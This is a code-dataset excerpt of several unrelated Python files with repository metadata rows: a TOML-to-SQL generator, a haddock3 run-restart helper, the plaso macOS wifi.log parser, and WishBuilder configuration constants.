main_win = create_main_window()
initial_urls = sys.argv[1:]
if not initial_urls:
initial_urls.append('https://www.google.com')
for url in initial_urls:
main_win.load_url_in_new_tab(QUrl.fromUserInput(url))
exit_code = app.exec_()
main_win.write_bookmarks()
sys.exit(exit_code)
| 39,278 | 698 | 2,793 |
a5d9db7e9536af8f118ef80fb9e0bd10dd06b72d | 3,321 | py | Python | dockerfiles/ingest/toml2sql.py | ctberthiaume/gradients3-data-integration | 1f1d5eeaa262cbac8298eff5787f3ba68483486a | [
"MIT"
] | null | null | null | dockerfiles/ingest/toml2sql.py | ctberthiaume/gradients3-data-integration | 1f1d5eeaa262cbac8298eff5787f3ba68483486a | [
"MIT"
] | null | null | null | dockerfiles/ingest/toml2sql.py | ctberthiaume/gradients3-data-integration | 1f1d5eeaa262cbac8298eff5787f3ba68483486a | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import click
import os
import sys
import toml
lu = { 'text': 'TEXT', 'real': 'DOUBLE PRECISION', 'time': 'TIMESTAMPTZ NOT NULL' }
@click.command()
@click.option('--no-geo-join', default=False, is_flag=True, show_default=True,
help="Don't produce the joined view to lat/lon, for example if this is the lat/lon data")
@click.argument('input', type=click.Path(exists=True), nargs=1)
if __name__ == '__main__':
main()
| 36.494505 | 112 | 0.602228 | #!/usr/bin/env python3
import click
import os
import sys
import toml
lu = { 'text': 'TEXT', 'real': 'DOUBLE PRECISION', 'time': 'TIMESTAMPTZ NOT NULL' }
@click.command()
@click.option('--no-geo-join', default=False, is_flag=True, show_default=True,
help="Don't produce the joined view to lat/lon, for example if this is the lat/lon data")
@click.argument('input', type=click.Path(exists=True), nargs=1)
def main(no_geo_join, input):
with open(input, newline=None, encoding='utf-8') as f:
toml_text = f.read()
data = toml.loads(toml_text)
print(create_table(data))
print('')
print(create_time_bucket_view(data))
if not no_geo_join:
print('')
print(create_geo_join_view(data))
def create_table(data):
    """Return SQL creating the raw hypertable for *data* (toml metadata)."""
    table = data['table']
    fields = data['fields']
    lines = ['CREATE TABLE IF NOT EXISTS {}_raw ('.format(table)]
    last = len(fields) - 1
    for idx, field in enumerate(fields):
        column = '    {} {}'.format(field['name'], lu[field['type']])
        # Every column definition except the last gets a trailing comma.
        lines.append(column + ',' if idx < last else column)
    lines.append(');')
    lines.append('')
    lines.append("SELECT create_hypertable('{}_raw', 'time', if_not_exists := true);".format(table))
    return os.linesep.join(lines)
def create_time_bucket_view(data, bucket_width='1m'):
    """Return SQL creating a time-bucketed averaging view over the raw table.

    Real columns are averaged per bucket; text columns flagged ``groupby``
    become additional GROUP BY columns.
    """
    table = data['table']
    numeric_cols = [f['name'] for f in data['fields'] if f['type'] == 'real']
    text_group_cols = [f['name'] for f in data['fields']
                       if f['type'] == 'text' and f['groupby']]
    out = ['CREATE OR REPLACE VIEW {} AS'.format(table)]
    out.append('  SELECT')
    out.append("    time_bucket('{}', {}_raw.time) AS time".format(bucket_width, table))
    for col in text_group_cols:
        out[-1] += ','
        out.append(f'    {col}')
    for col in numeric_cols:
        out[-1] += ','
        out.append(f'    avg({col}) as {col}')
    out.append('  FROM {}_raw'.format(table))
    out.append('  GROUP BY 1')
    # Positions 2..N+1 cover the text group columns in SELECT order.
    for position in range(2, len(text_group_cols) + 2):
        out[-1] += f', {position}'
    out.append('  ORDER BY 1;')
    return os.linesep.join(out)
def create_geo_join_view(data, bucket_width='1m'):
    """Return SQL creating a view that joins the bucketed view to `geo`.

    lat/lon columns from the data table are aliased to ``<table>_lat`` /
    ``<table>_lon`` so they do not collide with the geo table's lat/lon.

    Note: *bucket_width* is kept for interface compatibility but is unused
    here (the original only passed it to a no-op ``.format()`` on a string
    with no placeholder, which has been removed).
    """
    real_fields = [x['name'] for x in data['fields'] if x['type'] == 'real']
    group_fields = [x['name'] for x in data['fields'] if x['type'] == 'text' and x['groupby']]
    sql_lines = ['CREATE OR REPLACE VIEW {}_geo AS'.format(data['table'])]
    sql_lines.append('  SELECT')
    sql_lines.append("    a.time")
    for i, rf in enumerate(real_fields):
        sql_lines[-1] += ','
        if rf.lower() == 'lat' or rf.lower() == 'lon':
            sql_lines.append('    a.{} AS {}_{}'.format(rf, data['table'], rf))
        else:
            sql_lines.append(f'    a.{rf}')
    for i, gf in enumerate(group_fields):
        sql_lines[-1] += ','
        sql_lines.append(f'    a.{gf}')
    sql_lines[-1] += ','
    sql_lines.append('    b.lat')
    sql_lines[-1] += ','
    sql_lines.append('    b.lon')
    sql_lines.append('  FROM {} AS a'.format(data['table']))
    sql_lines.append('  INNER JOIN geo AS b')
    sql_lines.append('    ON a.time = b.time')
    sql_lines.append('  ORDER BY 1;')
    return os.linesep.join(sql_lines)
main()
| 2,778 | 0 | 91 |
8028ff85563dfd96fbbb5a7472e5dd3074d3c5e6 | 1,448 | py | Python | src/haddock/gear/restart_run.py | joaomcteixeira/haddock3 | b7f02978cea90622844acde874440d75f55cf446 | [
"Apache-2.0"
] | 21 | 2020-06-12T00:13:11.000Z | 2022-03-28T06:00:17.000Z | src/haddock/gear/restart_run.py | joaomcteixeira/haddock3 | b7f02978cea90622844acde874440d75f55cf446 | [
"Apache-2.0"
] | 293 | 2020-10-22T10:59:23.000Z | 2022-03-25T12:50:06.000Z | src/haddock/gear/restart_run.py | joaomcteixeira/haddock3 | b7f02978cea90622844acde874440d75f55cf446 | [
"Apache-2.0"
] | 17 | 2020-06-25T15:55:53.000Z | 2022-03-24T11:50:10.000Z | """Features to allow run restart from a given step."""
from argparse import ArgumentTypeError
from functools import partial
from haddock.libs.libutil import non_negative_int, remove_folder
_help_cli = """Restart the run from a given step. Previous folders from
the selected step onward will be deleted."""
_arg_non_neg_int = partial(
non_negative_int,
exception=ArgumentTypeError,
emsg="Minimum value is 0, {!r} given.",
)
def add_restart_arg(parser):
    """Add the ``--restart`` command-line option to *parser*."""
    restart_kwargs = {
        "type": _arg_non_neg_int,
        "default": None,
        "help": _help_cli,
        }
    parser.add_argument("--restart", **restart_kwargs)
def remove_folders_after_number(run_dir, num):
    """
    Delete calculation step folders numbered *num* and onward (inclusive).
    For example, given step folders ``00_topoaa``, ``01_rigidbody``,
    ``02_mdref`` and ``03_flexref``, a *num* of ``2`` deletes ``02_mdref``
    and ``03_flexref``.
    Parameters
    ----------
    run_dir : pathlib.Path
        The run directory.
    num : int
        Index of the first step folder to delete. Must be a non-negative
        integer, or an equivalent representation.
    """
    start = _arg_non_neg_int(num)
    step_folders = sorted(run_dir.resolve().glob('[0-9][0-9]*/'))
    for step_folder in step_folders[start:]:
        remove_folder(step_folder)
| 24.133333 | 71 | 0.652624 | """Features to allow run restart from a given step."""
from argparse import ArgumentTypeError
from functools import partial
from haddock.libs.libutil import non_negative_int, remove_folder
_help_cli = """Restart the run from a given step. Previous folders from
the selected step onward will be deleted."""
_arg_non_neg_int = partial(
non_negative_int,
exception=ArgumentTypeError,
emsg="Minimum value is 0, {!r} given.",
)
def add_restart_arg(parser):
    """Add the ``--restart`` command-line option to *parser*."""
    restart_kwargs = {
        "type": _arg_non_neg_int,
        "default": None,
        "help": _help_cli,
        }
    parser.add_argument("--restart", **restart_kwargs)
def remove_folders_after_number(run_dir, num):
    """
    Delete calculation step folders numbered *num* and onward (inclusive).
    For example, given step folders ``00_topoaa``, ``01_rigidbody``,
    ``02_mdref`` and ``03_flexref``, a *num* of ``2`` deletes ``02_mdref``
    and ``03_flexref``.
    Parameters
    ----------
    run_dir : pathlib.Path
        The run directory.
    num : int
        Index of the first step folder to delete. Must be a non-negative
        integer, or an equivalent representation.
    """
    start = _arg_non_neg_int(num)
    step_folders = sorted(run_dir.resolve().glob('[0-9][0-9]*/'))
    for step_folder in step_folders[start:]:
        remove_folder(step_folder)
| 0 | 0 | 0 |
8a59815a3eab468647b6b48617378fa144d3d33e | 10,474 | py | Python | plaso/parsers/mac_wifi.py | pyllyukko/plaso | 7533db2d1035ca71d264d6281ebd5db2d073c587 | [
"Apache-2.0"
] | 2 | 2021-05-31T17:16:48.000Z | 2022-02-01T16:59:12.000Z | plaso/parsers/mac_wifi.py | pyllyukko/plaso | 7533db2d1035ca71d264d6281ebd5db2d073c587 | [
"Apache-2.0"
] | null | null | null | plaso/parsers/mac_wifi.py | pyllyukko/plaso | 7533db2d1035ca71d264d6281ebd5db2d073c587 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""Parses for MacOS Wifi log (wifi.log) files."""
import re
import pyparsing
from dfdatetime import time_elements as dfdatetime_time_elements
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import errors
from plaso.lib import definitions
from plaso.lib import timelib
from plaso.parsers import logger
from plaso.parsers import manager
from plaso.parsers import text_parser
class MacWifiLogEventData(events.EventData):
  """Mac Wifi log event data.
  Attributes:
    action (str): known WiFI action, for example connected to an AP,
        configured, etc. If the action is not known, the value is
        the message of the log (text variable).
    agent (str): name and identifier of process that generated the log message.
    function (str): name of function that generated the log message.
    text (str): log message
  """
  DATA_TYPE = 'mac:wifilog:line'
  def __init__(self):
    """Initializes event data."""
    super(MacWifiLogEventData, self).__init__(data_type=self.DATA_TYPE)
    # Attributes default to None until populated by MacWifiLogParser.
    self.action = None
    self.agent = None
    self.function = None
    self.text = None
class MacWifiLogParser(text_parser.PyparsingSingleLineTextParser):
  """Parses MacOS Wifi log (wifi.log) files."""
  NAME = 'macwifi'
  DATA_FORMAT = 'MacOS Wifi log (wifi.log) file'
  _ENCODING = 'utf-8'
  # Shorthand for frequently used pyparsing building blocks.
  THREE_DIGITS = text_parser.PyparsingConstants.THREE_DIGITS
  THREE_LETTERS = text_parser.PyparsingConstants.THREE_LETTERS
  # Regular expressions for known actions.
  _CONNECTED_RE = re.compile(r'Already\sassociated\sto\s(.*)\.\sBailing')
  _WIFI_PARAMETERS_RE = re.compile(
      r'\[ssid=(.*?), bssid=(.*?), security=(.*?), rssi=')
  # Function names whose log text _GetAction rewrites into a friendlier form.
  _KNOWN_FUNCTIONS = [
      'airportdProcessDLILEvent',
      '_doAutoJoin',
      '_processSystemPSKAssoc']
  # Matches the agent token: "<airportd" followed by anything up to ">".
  _AGENT = (
      pyparsing.Literal('<') +
      pyparsing.Combine(
          pyparsing.Literal('airportd') + pyparsing.CharsNotIn('>'),
          joinString='', adjacent=True).setResultsName('agent') +
      pyparsing.Literal('>'))
  # Weekday, month, day, time and milliseconds; wifi.log carries no year.
  _DATE_TIME = pyparsing.Group(
      THREE_LETTERS.setResultsName('day_of_week') +
      THREE_LETTERS.setResultsName('month') +
      text_parser.PyparsingConstants.ONE_OR_TWO_DIGITS.setResultsName('day') +
      text_parser.PyparsingConstants.TIME_ELEMENTS + pyparsing.Suppress('.') +
      THREE_DIGITS.setResultsName('milliseconds'))
  # Log line with a known function name.
  _MAC_WIFI_KNOWN_FUNCTION_LINE = (
      _DATE_TIME.setResultsName('date_time') + _AGENT +
      pyparsing.oneOf(_KNOWN_FUNCTIONS).setResultsName('function') +
      pyparsing.Literal(':') +
      pyparsing.SkipTo(pyparsing.lineEnd).setResultsName('text'))
  # Log line with an unknown function name.
  _MAC_WIFI_LINE = (
      _DATE_TIME.setResultsName('date_time') + pyparsing.NotAny(
          _AGENT +
          pyparsing.oneOf(_KNOWN_FUNCTIONS) +
          pyparsing.Literal(':')) +
      pyparsing.SkipTo(pyparsing.lineEnd).setResultsName('text'))
  # Banner line written at daemon start-up.
  _MAC_WIFI_HEADER = (
      _DATE_TIME.setResultsName('date_time') +
      pyparsing.Literal('***Starting Up***').setResultsName('text'))
  # Date and time of the log rotation header (month and day only, no
  # weekday or milliseconds).
  _DATE_TIME_TURNED_OVER_HEADER = pyparsing.Group(
      text_parser.PyparsingConstants.MONTH.setResultsName('month') +
      text_parser.PyparsingConstants.ONE_OR_TWO_DIGITS.setResultsName('day') +
      text_parser.PyparsingConstants.TIME_ELEMENTS)
  _MAC_WIFI_TURNED_OVER_HEADER = (
      _DATE_TIME_TURNED_OVER_HEADER.setResultsName('date_time') +
      pyparsing.Combine(
          pyparsing.Word(pyparsing.printables) +
          pyparsing.Word(pyparsing.printables) +
          pyparsing.Literal('logfile turned over') +
          pyparsing.LineEnd(),
          joinString=' ', adjacent=False).setResultsName('text'))
  # Define the available log line structures.
  LINE_STRUCTURES = [
      ('header', _MAC_WIFI_HEADER),
      ('turned_over_header', _MAC_WIFI_TURNED_OVER_HEADER),
      ('known_function_logline', _MAC_WIFI_KNOWN_FUNCTION_LINE),
      ('logline', _MAC_WIFI_LINE)]
  _SUPPORTED_KEYS = frozenset([key for key, _ in LINE_STRUCTURES])
  def __init__(self):
    """Initializes a parser."""
    super(MacWifiLogParser, self).__init__()
    # The log has no year; track the last month seen so a month rollover
    # can be used to infer a year change (see _GetTimeElementsTuple).
    self._last_month = 0
    self._year_use = 0
  def _GetAction(self, action, text):
    """Parse the well known actions for easy reading.
    Args:
      action (str): the function or action called by the agent.
      text (str): mac Wifi log text.
    Returns:
      str: a formatted string representing the known (or common) action.
          If the action is not known the original log text is returned.
    """
    # TODO: replace "x in y" checks by startswith if possible.
    if 'airportdProcessDLILEvent' in action:
      interface = text.split()[0]
      return 'Interface {0:s} turn up.'.format(interface)
    if 'doAutoJoin' in action:
      match = self._CONNECTED_RE.match(text)
      if match:
        # Strip the surrounding quote characters from the SSID.
        ssid = match.group(1)[1:-1]
      else:
        ssid = 'Unknown'
      return 'Wifi connected to SSID {0:s}'.format(ssid)
    if 'processSystemPSKAssoc' in action:
      wifi_parameters = self._WIFI_PARAMETERS_RE.search(text)
      if wifi_parameters:
        ssid = wifi_parameters.group(1)
        bssid = wifi_parameters.group(2)
        security = wifi_parameters.group(3)
        if not ssid:
          ssid = 'Unknown'
        if not bssid:
          bssid = 'Unknown'
        if not security:
          security = 'Unknown'
        return (
            'New wifi configured. BSSID: {0:s}, SSID: {1:s}, '
            'Security: {2:s}.').format(bssid, ssid, security)
    return text
  def _GetTimeElementsTuple(self, key, structure):
    """Retrieves a time elements tuple from the structure.
    Args:
      key (str): name of the parsed structure.
      structure (pyparsing.ParseResults): structure of tokens derived from
          a line of a text file.
    Returns:
      tuple: containing:
        year (int): year.
        month (int): month, where 1 represents January.
        day_of_month (int): day of month, where 1 is the first day of the month.
        hours (int): hours.
        minutes (int): minutes.
        seconds (int): seconds.
        milliseconds (int): milliseconds.
    """
    time_elements_tuple = self._GetValueFromStructure(structure, 'date_time')
    # TODO: what if time_elements_tuple is None.
    if key == 'turned_over_header':
      # The turn-over header carries no weekday or milliseconds.
      month, day, hours, minutes, seconds = time_elements_tuple
      milliseconds = 0
    else:
      _, month, day, hours, minutes, seconds, milliseconds = time_elements_tuple
    # Note that dfdatetime_time_elements.TimeElements will raise ValueError
    # for an invalid month.
    month = timelib.MONTH_DICT.get(month.lower(), 0)
    if month != 0 and month < self._last_month:
      # Gap detected between years.
      self._year_use += 1
    return self._year_use, month, day, hours, minutes, seconds, milliseconds
  def _ParseLogLine(self, parser_mediator, key, structure):
    """Parse a single log line and produce an event object.
    Args:
      parser_mediator (ParserMediator): mediates interactions between parsers
          and other components, such as storage and dfvfs.
      key (str): name of the parsed structure.
      structure (pyparsing.ParseResults): structure of tokens derived from
          a line of a text file.
    """
    time_elements_tuple = self._GetTimeElementsTuple(key, structure)
    try:
      date_time = dfdatetime_time_elements.TimeElementsInMilliseconds(
          time_elements_tuple=time_elements_tuple)
    except ValueError:
      parser_mediator.ProduceExtractionWarning(
          'invalid date time value: {0!s}'.format(time_elements_tuple))
      return
    # Remember the month so the next line can detect a year rollover.
    self._last_month = time_elements_tuple[1]
    function = self._GetValueFromStructure(structure, 'function')
    text = self._GetValueFromStructure(structure, 'text')
    if text:
      text = text.strip()
    event_data = MacWifiLogEventData()
    event_data.agent = self._GetValueFromStructure(structure, 'agent')
    event_data.function = function
    event_data.text = text
    if key == 'known_function_logline':
      event_data.action = self._GetAction(
          event_data.function, event_data.text)
    event = time_events.DateTimeValuesEvent(
        date_time, definitions.TIME_DESCRIPTION_ADDED)
    parser_mediator.ProduceEventWithEventData(event, event_data)
  def ParseRecord(self, parser_mediator, key, structure):
    """Parses a log record structure and produces events.
    Args:
      parser_mediator (ParserMediator): mediates interactions between parsers
          and other components, such as storage and dfvfs.
      key (str): name of the parsed structure.
      structure (pyparsing.ParseResults): structure of tokens derived from
          a line of a text file.
    Raises:
      ParseError: when the structure type is unknown.
    """
    if key not in self._SUPPORTED_KEYS:
      raise errors.ParseError(
          'Unable to parse record, unknown structure: {0:s}'.format(key))
    self._ParseLogLine(parser_mediator, key, structure)
  def VerifyStructure(self, parser_mediator, line):
    """Verify that this file is a Mac Wifi log file.
    Args:
      parser_mediator (ParserMediator): mediates interactions between parsers
          and other components, such as storage and dfvfs.
      line (str): line from a text file.
    Returns:
      bool: True if the line is in the expected format, False if not.
    """
    self._last_month = 0
    self._year_use = parser_mediator.GetEstimatedYear()
    # A valid file starts with either the startup banner or a turn-over
    # header; try the banner first.
    key = 'header'
    try:
      structure = self._MAC_WIFI_HEADER.parseString(line)
    except pyparsing.ParseException:
      structure = None
    if not structure:
      key = 'turned_over_header'
      try:
        structure = self._MAC_WIFI_TURNED_OVER_HEADER.parseString(line)
      except pyparsing.ParseException:
        structure = None
    if not structure:
      logger.debug('Not a Mac Wifi log file')
      return False
    time_elements_tuple = self._GetTimeElementsTuple(key, structure)
    try:
      dfdatetime_time_elements.TimeElementsInMilliseconds(
          time_elements_tuple=time_elements_tuple)
    except ValueError:
      logger.debug(
          'Not a Mac Wifi log file, invalid date and time: {0!s}'.format(
              time_elements_tuple))
      return False
    self._last_month = time_elements_tuple[1]
    return True
# Importing this module registers the parser with the plaso parsers manager.
manager.ParsersManager.RegisterParser(MacWifiLogParser)
| 33.14557 | 80 | 0.686939 | # -*- coding: utf-8 -*-
"""Parses for MacOS Wifi log (wifi.log) files."""
import re
import pyparsing
from dfdatetime import time_elements as dfdatetime_time_elements
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import errors
from plaso.lib import definitions
from plaso.lib import timelib
from plaso.parsers import logger
from plaso.parsers import manager
from plaso.parsers import text_parser
class MacWifiLogEventData(events.EventData):
  """Mac Wifi log event data.
  Attributes:
    action (str): known WiFI action, for example connected to an AP,
        configured, etc. If the action is not known, the value is
        the message of the log (text variable).
    agent (str): name and identifier of process that generated the log message.
    function (str): name of function that generated the log message.
    text (str): log message
  """
  DATA_TYPE = 'mac:wifilog:line'
  def __init__(self):
    """Initializes event data."""
    super(MacWifiLogEventData, self).__init__(data_type=self.DATA_TYPE)
    # Attributes default to None until populated by MacWifiLogParser.
    self.action = None
    self.agent = None
    self.function = None
    self.text = None
class MacWifiLogParser(text_parser.PyparsingSingleLineTextParser):
  """Parses MacOS Wifi log (wifi.log) files."""
  NAME = 'macwifi'
  DATA_FORMAT = 'MacOS Wifi log (wifi.log) file'
  _ENCODING = 'utf-8'
  # Shorthand for frequently used pyparsing building blocks.
  THREE_DIGITS = text_parser.PyparsingConstants.THREE_DIGITS
  THREE_LETTERS = text_parser.PyparsingConstants.THREE_LETTERS
  # Regular expressions for known actions.
  _CONNECTED_RE = re.compile(r'Already\sassociated\sto\s(.*)\.\sBailing')
  _WIFI_PARAMETERS_RE = re.compile(
      r'\[ssid=(.*?), bssid=(.*?), security=(.*?), rssi=')
  # Function names whose log text _GetAction rewrites into a friendlier form.
  _KNOWN_FUNCTIONS = [
      'airportdProcessDLILEvent',
      '_doAutoJoin',
      '_processSystemPSKAssoc']
  # Matches the agent token: "<airportd" followed by anything up to ">".
  _AGENT = (
      pyparsing.Literal('<') +
      pyparsing.Combine(
          pyparsing.Literal('airportd') + pyparsing.CharsNotIn('>'),
          joinString='', adjacent=True).setResultsName('agent') +
      pyparsing.Literal('>'))
  # Weekday, month, day, time and milliseconds; wifi.log carries no year.
  _DATE_TIME = pyparsing.Group(
      THREE_LETTERS.setResultsName('day_of_week') +
      THREE_LETTERS.setResultsName('month') +
      text_parser.PyparsingConstants.ONE_OR_TWO_DIGITS.setResultsName('day') +
      text_parser.PyparsingConstants.TIME_ELEMENTS + pyparsing.Suppress('.') +
      THREE_DIGITS.setResultsName('milliseconds'))
  # Log line with a known function name.
  _MAC_WIFI_KNOWN_FUNCTION_LINE = (
      _DATE_TIME.setResultsName('date_time') + _AGENT +
      pyparsing.oneOf(_KNOWN_FUNCTIONS).setResultsName('function') +
      pyparsing.Literal(':') +
      pyparsing.SkipTo(pyparsing.lineEnd).setResultsName('text'))
  # Log line with an unknown function name.
  _MAC_WIFI_LINE = (
      _DATE_TIME.setResultsName('date_time') + pyparsing.NotAny(
          _AGENT +
          pyparsing.oneOf(_KNOWN_FUNCTIONS) +
          pyparsing.Literal(':')) +
      pyparsing.SkipTo(pyparsing.lineEnd).setResultsName('text'))
  # Banner line written at daemon start-up.
  _MAC_WIFI_HEADER = (
      _DATE_TIME.setResultsName('date_time') +
      pyparsing.Literal('***Starting Up***').setResultsName('text'))
  # Date and time of the log rotation header (month and day only, no
  # weekday or milliseconds).
  _DATE_TIME_TURNED_OVER_HEADER = pyparsing.Group(
      text_parser.PyparsingConstants.MONTH.setResultsName('month') +
      text_parser.PyparsingConstants.ONE_OR_TWO_DIGITS.setResultsName('day') +
      text_parser.PyparsingConstants.TIME_ELEMENTS)
  _MAC_WIFI_TURNED_OVER_HEADER = (
      _DATE_TIME_TURNED_OVER_HEADER.setResultsName('date_time') +
      pyparsing.Combine(
          pyparsing.Word(pyparsing.printables) +
          pyparsing.Word(pyparsing.printables) +
          pyparsing.Literal('logfile turned over') +
          pyparsing.LineEnd(),
          joinString=' ', adjacent=False).setResultsName('text'))
  # Define the available log line structures.
  LINE_STRUCTURES = [
      ('header', _MAC_WIFI_HEADER),
      ('turned_over_header', _MAC_WIFI_TURNED_OVER_HEADER),
      ('known_function_logline', _MAC_WIFI_KNOWN_FUNCTION_LINE),
      ('logline', _MAC_WIFI_LINE)]
  _SUPPORTED_KEYS = frozenset([key for key, _ in LINE_STRUCTURES])
  def __init__(self):
    """Initializes a parser."""
    super(MacWifiLogParser, self).__init__()
    # The log has no year; track the last month seen so a month rollover
    # can be used to infer a year change (see _GetTimeElementsTuple).
    self._last_month = 0
    self._year_use = 0
  def _GetAction(self, action, text):
    """Parse the well known actions for easy reading.
    Args:
      action (str): the function or action called by the agent.
      text (str): mac Wifi log text.
    Returns:
      str: a formatted string representing the known (or common) action.
          If the action is not known the original log text is returned.
    """
    # TODO: replace "x in y" checks by startswith if possible.
    if 'airportdProcessDLILEvent' in action:
      interface = text.split()[0]
      return 'Interface {0:s} turn up.'.format(interface)
    if 'doAutoJoin' in action:
      match = self._CONNECTED_RE.match(text)
      if match:
        # Strip the surrounding quote characters from the SSID.
        ssid = match.group(1)[1:-1]
      else:
        ssid = 'Unknown'
      return 'Wifi connected to SSID {0:s}'.format(ssid)
    if 'processSystemPSKAssoc' in action:
      wifi_parameters = self._WIFI_PARAMETERS_RE.search(text)
      if wifi_parameters:
        ssid = wifi_parameters.group(1)
        bssid = wifi_parameters.group(2)
        security = wifi_parameters.group(3)
        if not ssid:
          ssid = 'Unknown'
        if not bssid:
          bssid = 'Unknown'
        if not security:
          security = 'Unknown'
        return (
            'New wifi configured. BSSID: {0:s}, SSID: {1:s}, '
            'Security: {2:s}.').format(bssid, ssid, security)
    return text
  def _GetTimeElementsTuple(self, key, structure):
    """Retrieves a time elements tuple from the structure.
    Args:
      key (str): name of the parsed structure.
      structure (pyparsing.ParseResults): structure of tokens derived from
          a line of a text file.
    Returns:
      tuple: containing:
        year (int): year.
        month (int): month, where 1 represents January.
        day_of_month (int): day of month, where 1 is the first day of the month.
        hours (int): hours.
        minutes (int): minutes.
        seconds (int): seconds.
        milliseconds (int): milliseconds.
    """
    time_elements_tuple = self._GetValueFromStructure(structure, 'date_time')
    # TODO: what if time_elements_tuple is None.
    if key == 'turned_over_header':
      # The turn-over header carries no weekday or milliseconds.
      month, day, hours, minutes, seconds = time_elements_tuple
      milliseconds = 0
    else:
      _, month, day, hours, minutes, seconds, milliseconds = time_elements_tuple
    # Note that dfdatetime_time_elements.TimeElements will raise ValueError
    # for an invalid month.
    month = timelib.MONTH_DICT.get(month.lower(), 0)
    if month != 0 and month < self._last_month:
      # Gap detected between years.
      self._year_use += 1
    return self._year_use, month, day, hours, minutes, seconds, milliseconds
  def _ParseLogLine(self, parser_mediator, key, structure):
    """Parse a single log line and produce an event object.
    Args:
      parser_mediator (ParserMediator): mediates interactions between parsers
          and other components, such as storage and dfvfs.
      key (str): name of the parsed structure.
      structure (pyparsing.ParseResults): structure of tokens derived from
          a line of a text file.
    """
    time_elements_tuple = self._GetTimeElementsTuple(key, structure)
    try:
      date_time = dfdatetime_time_elements.TimeElementsInMilliseconds(
          time_elements_tuple=time_elements_tuple)
    except ValueError:
      parser_mediator.ProduceExtractionWarning(
          'invalid date time value: {0!s}'.format(time_elements_tuple))
      return
    # Remember the month so the next line can detect a year rollover.
    self._last_month = time_elements_tuple[1]
    function = self._GetValueFromStructure(structure, 'function')
    text = self._GetValueFromStructure(structure, 'text')
    if text:
      text = text.strip()
    event_data = MacWifiLogEventData()
    event_data.agent = self._GetValueFromStructure(structure, 'agent')
    event_data.function = function
    event_data.text = text
    if key == 'known_function_logline':
      event_data.action = self._GetAction(
          event_data.function, event_data.text)
    event = time_events.DateTimeValuesEvent(
        date_time, definitions.TIME_DESCRIPTION_ADDED)
    parser_mediator.ProduceEventWithEventData(event, event_data)
  def ParseRecord(self, parser_mediator, key, structure):
    """Parses a log record structure and produces events.
    Args:
      parser_mediator (ParserMediator): mediates interactions between parsers
          and other components, such as storage and dfvfs.
      key (str): name of the parsed structure.
      structure (pyparsing.ParseResults): structure of tokens derived from
          a line of a text file.
    Raises:
      ParseError: when the structure type is unknown.
    """
    if key not in self._SUPPORTED_KEYS:
      raise errors.ParseError(
          'Unable to parse record, unknown structure: {0:s}'.format(key))
    self._ParseLogLine(parser_mediator, key, structure)
  def VerifyStructure(self, parser_mediator, line):
    """Verify that this file is a Mac Wifi log file.
    Args:
      parser_mediator (ParserMediator): mediates interactions between parsers
          and other components, such as storage and dfvfs.
      line (str): line from a text file.
    Returns:
      bool: True if the line is in the expected format, False if not.
    """
    self._last_month = 0
    self._year_use = parser_mediator.GetEstimatedYear()
    # A valid file starts with either the startup banner or a turn-over
    # header; try the banner first.
    key = 'header'
    try:
      structure = self._MAC_WIFI_HEADER.parseString(line)
    except pyparsing.ParseException:
      structure = None
    if not structure:
      key = 'turned_over_header'
      try:
        structure = self._MAC_WIFI_TURNED_OVER_HEADER.parseString(line)
      except pyparsing.ParseException:
        structure = None
    if not structure:
      logger.debug('Not a Mac Wifi log file')
      return False
    time_elements_tuple = self._GetTimeElementsTuple(key, structure)
    try:
      dfdatetime_time_elements.TimeElementsInMilliseconds(
          time_elements_tuple=time_elements_tuple)
    except ValueError:
      logger.debug(
          'Not a Mac Wifi log file, invalid date and time: {0!s}'.format(
              time_elements_tuple))
      return False
    self._last_month = time_elements_tuple[1]
    return True
# Importing this module registers the parser with the plaso parsers manager.
manager.ParsersManager.RegisterParser(MacWifiLogParser)
| 0 | 0 | 0 |
eb62b09f285ab01c80232f4e0051951e202019a7 | 1,480 | py | Python | Constants.py | kimballh/WishBuilderCI | 6e5eb9c714df43d3866a6688e59dcaf8f201ef06 | [
"MIT"
] | 1 | 2018-05-18T20:33:41.000Z | 2018-05-18T20:33:41.000Z | Constants.py | kimballh/WishBuilderCI | 6e5eb9c714df43d3866a6688e59dcaf8f201ef06 | [
"MIT"
] | null | null | null | Constants.py | kimballh/WishBuilderCI | 6e5eb9c714df43d3866a6688e59dcaf8f201ef06 | [
"MIT"
] | null | null | null | MAX_NUM_PROCESSES = 4
# GitHub API endpoint of the WishBuilder repository.
REPO_URL = 'https://api.github.com/repos/srp33/WishBuilder/'
# Filesystem locations, all rooted at WB_DIRECTORY.
WB_DIRECTORY = '/app/'
SQLITE_FILE = WB_DIRECTORY + 'WishBuilderCI/history.sql'
TESTING_LOCATION = WB_DIRECTORY + 'WishBuilderCI/testing/'
RAW_DATA_STORAGE = WB_DIRECTORY + 'RawDatasets/'
GENEY_DATA_LOCATION = WB_DIRECTORY + 'GeneyDatasets/'
GENEY_CONVERTER = WB_DIRECTORY + 'GeneyTypeConverter/typeconverter.py'
# Size limits and thresholds applied during validation.
MIN_TEST_CASES = 8
MIN_FEATURES = 2
MIN_SAMPLES = 2
MAX_TITLE_SIZE = 300
NUM_SAMPLE_ROWS = 5
NUM_SAMPLE_COLUMNS = 5
# Symbols used when rendering test reports.
CHECK_MARK = '✅'
RED_X = '❌'
WARNING_SYMBOL = "<p><font color=\"orange\" size=\"+2\">⚠\t</font>"
# File names expected in a submission / produced by the test run.
KEY_DATA_NAME = 'test_data.tsv'
KEY_META_DATA_NAME = 'test_metadata.tsv'
TEST_DATA_NAME = 'data.tsv.gz'
TEST_META_DATA_NAME = 'metadata.tsv.gz'
DOWNLOAD_FILE_NAME = 'download.sh'
INSTALL_FILE_NAME = 'install.sh'
PARSE_FILE_NAME = 'parse.sh'
CLEANUP_FILE_NAME = 'cleanup.sh'
DESCRIPTION_FILE_NAME = 'description.md'
CONFIG_FILE_NAME = 'config.yaml'
REQUIRED_FILES = [KEY_DATA_NAME, KEY_META_DATA_NAME, DOWNLOAD_FILE_NAME, INSTALL_FILE_NAME, PARSE_FILE_NAME,
                  CLEANUP_FILE_NAME, DESCRIPTION_FILE_NAME, CONFIG_FILE_NAME]
REQUIRED_CONFIGS = ['title', 'featureDescription', 'featureDescriptionPlural']
# These are the executables that will be ran to produce the data and metadata files (They are executed in this order)
USER_SCRIPTS = [INSTALL_FILE_NAME, DOWNLOAD_FILE_NAME, PARSE_FILE_NAME]
KEY_FILES = [KEY_DATA_NAME, KEY_META_DATA_NAME]
